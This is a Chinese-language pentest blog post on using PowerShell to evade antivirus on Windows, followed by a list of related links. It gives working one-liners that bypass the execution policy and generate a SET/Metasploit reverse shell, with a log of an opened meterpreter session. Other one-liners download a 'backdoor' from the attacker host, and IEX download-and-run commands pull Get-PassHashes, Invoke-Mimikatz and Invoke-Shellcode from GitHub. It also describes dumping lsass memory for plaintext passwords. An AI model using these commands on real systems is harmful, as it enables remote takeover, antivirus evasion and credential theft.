Powershell tricks::Bypass AV
0x00 Powershell 簡介
Powershell猶如linux下的bash,並且在windows中Powershell可以利用.NET Framework的強大功能,也可以呼叫windows API,在win7/server 2008以後,powershell已被整合在系統當中。 Powershell強大的功能特性給windows管理帶來了極大的便利,同時也更加便於windows下的滲透測試。
0x01 PowerShell Execution Policy
Powershell指令碼預設情況下無法雙擊或在cmd下執行。在執行時需要透過一些方法繞過該策略。 最簡單的方法就是執行powershell.exe附加需要執行的命令,也可以將要執行的指令碼直接複製進powershell的視窗。 當然也可以Download and execute
,如下面示例中一樣。
如果需要執行ps1檔案時,也可以這樣:
PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1
不建議使用其他方法全域性改變執行策略,如果場景不同可以根據參考自行選擇執行方式。
0x02 Reverse the Shell
在遇到防護軟體時,可以使用powershell執行shellcode返回shell。執行指令碼可以用msf生成,也可以用set工具包生成,注意的是msf生成的ps1檔案,而set生成的是bat檔案。 下面是在set中生成的過程:
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
..SNIP...
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set> 10
The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventative technologies.
1) Powershell Alphanumeric Shellcode Injector
2) Powershell Reverse Shell
3) Powershell Bind Shell
4) Powershell Dump SAM Database
99) Return to Main Menu
set:powershell>1
set> IP address for the payload listener: 192.168.200.159
set:powershell> Enter the port for the reverse [443]:4444
[*] Prepping the payload for delivery and injecting alphanumeric shellcode...
[*] Generating x86-based powershell injection code...
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...
[*] If you want the powershell commands and attack, they are exported to /root/.set/reports/powershell/
set> Do you want to start the listener now [yes/no]: : yes
..SNIP...
[*] Processing /root/.set/reports/powershell/powershell.rc for ERB directives.
resource (/root/.set/reports/powershell/powershell.rc)> use multi/handler
resource (/root/.set/reports/powershell/powershell.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/.set/reports/powershell/powershell.rc)> set lport 4444
lport => 4444
resource (/root/.set/reports/powershell/powershell.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (/root/.set/reports/powershell/powershell.rc)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.200.158
[*] Meterpreter session 1 opened (192.168.200.159:4444 -> 192.168.200.158:49818) at 2014-10-23 18:17:35 +0800
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 WIN-M49V8M0CSH2\server @ WIN-M49V8M0CSH2 192.168.200.159:4444 -> 192.168.200.158:49818 (192.168.200.158)
生成的檔案在/root/.set/reports/powershell/
下。 其中x86_powershell_injection.txt
為bat檔案,可以直接改名執行。 在這裡有個技巧可以透過powershell一句話直接下載檔案。
powershell (new-object System.Net.WebClient).DownloadFile( 'http://192.168.200.159/backdoor','backdoor.bat')
然後再執行就可以得到meterpreter會話了。
並且可以正常執行cmd命令、dump hash明文等操作。
0x03 Dump the hash
當然在僅僅需要dump hash時,也可以藉助powershell來完成。
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes
0x04 Dump the plain Password
同樣也可以用下面的方式(執行powershell版的Mimikatz)獲取明文。
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCerts
值得注意的是在這裡也可以透過Command引數執行Mimikatz命令。
0x05 Memory Dumping
Powershell也可以完成像procdump一樣的工作,獲取某個程式的dumps。 這裡演示獲取lsass.exe的dumps,然後再用Mimikatz從dumps中獲取明文。
然後將lsass dumps檔案下載回來用Mimikatz分析可以得到明文密碼。
當然記憶體dumps不僅僅可以獲取windows密碼,往往程式記憶體中或許會儲存其他重要的資訊或資料。參考http://blog.spiderlabs.com/2012/07/pentesting-like-an-eastern-european.html。
0x06 Execute the shellcode
Powershell由於豐富的擴充套件功能使得其呼叫windows API非常方便,所以同樣也可以執行shellcode,這一過程如下:
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode –help
但是在這裡有個問題,就是x64下shellcode已有的很少,往往透過網上搜集的shellcode都是x86的。如果直接執行x86的shellcode則會出錯。
不過Invoke-Shellcode.ps1指令碼預設是將shellcode注入在powershell.exe程式中,那麼便可以用64位系統環境下32位的powershell.exe執行x86的shellcode,過程如下:
c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Shellcode 0x90,0x90,0x90 ...
並且這一過程適用於大部分msfpayload生成的shellcode。當然在windows下執行shellcode也可以用其它的方法,比如shellcodeexec。不過這個方法並不能bypass AV。但是大家可以根據原始碼自行bypass。
未完待續。
相關文章
- Powershell tricks::Powershell Remoting2020-08-19REM
- Powershell tricks::Code Execution & Process Injection2020-08-19
- Tricks2024-10-23
- PyQt Tricks2020-12-07QT
- jQuery tips and tricks2021-09-09jQuery
- Bypass WAF Cookbook2020-08-19
- Bypass Windows AppLocker2020-08-19WindowsAPP
- 【筆記】Tricks - 期望2024-04-20筆記
- IPS BYPASS姿勢2020-08-19
- Bypass IE XSS Filter2020-08-19Filter
- bypass disable_function2020-11-26Function
- Powershell————1、認識Powershell2018-05-24
- 【筆記】Tricks - 根號2024-04-20筆記
- 【筆記】Tricks - 雜項2024-06-26筆記
- bypass waf測試_rce2024-10-25
- 內網簡單bypass2020-11-30內網
- Powershell————2、Powershell互動式2018-05-24
- CMDR-05: Tricks / Walks / Hooks2019-06-16Hook
- C++刷題tricks整理2024-10-22C++
- Use SCT to Bypass Application Whitelisting Protection2020-08-19APP
- Bypass McAfee Application Control——Code Execution2020-08-19APP
- JNDI注入和JNDI注入Bypass2021-06-08
- Powershell(3)2018-08-20
- PowerShell使用2024-06-10
- PowerShell 使用2024-06-06
- Windows PowerShell2024-05-30Windows
- 資料競賽Tricks集錦2019-09-18
- # 有點用的工具使用tricks2024-05-29
- WAF Bypass 介紹與實戰2023-02-16
- 【奇淫巧技】Bypass阿里雲注入2021-02-06阿里
- 深度學習調參tricks總結!2020-10-01深度學習
- 深度學習調參tricks總結2020-10-03深度學習
- 出Hi3559AV1002023-04-01
- powershell指令碼2024-04-10指令碼
- PowerShell HelpWriter 20212021-11-20
- Powershell免殺2021-05-02
- Bypass xss過濾的測試方法2020-08-19
- Bypass McAfee Application Control--Write&Read Protection2020-08-19APP